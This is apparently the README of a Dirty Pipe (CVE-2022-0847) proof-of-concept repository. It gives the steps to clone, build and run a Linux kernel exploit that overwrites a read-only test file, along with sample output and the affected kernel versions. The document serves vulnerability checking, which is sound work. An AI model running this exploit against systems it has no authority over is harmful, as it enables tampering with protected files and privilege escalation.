CVE-2022-0847 POC - https://dirtypipe.cm4all.com/
This exploit attempts to use the CVE-2022-0847 vulnerability to overwrite a read only file.
When make exploit is run, it will:
- Create a
read_only_file.txt - Execute the
dirtypipeexploit. - Check if the
dirtypipeexploit worked.
You can determine if your system is vulnerable by the output of make exploit:
foo@bar:~$ make exploit # vulnerable
[*] Creating read_only_file.txt...
[*] Press any key to continue...
[*] Running exploit...
[*] Exploit was successful!
foo@bar:~$ make exploit # not vulnerable
[*] Creating read_only_file.txt...
[*] Press any key to continue...
[*] Running exploit...
[!] Exploit was not successful!foo@bar:~$ cd /tmp # We don't need to keep these files.
foo@bar:~$ git clone https://github.com/breachnix/dirty-pipe-poc && cd dirty-pipe-poc
foo@bar:~$ make && make exploit # make & cc will need to be installed.This vulnerability affects any kernel version higher than 5.8 but lower than 5.16.11, 5.15.25, or 5.10.102.
You can determine your kernel version by executing uname -sr:
foo@bar:~$ uname -sr
Linux 5.10.0-12-amd64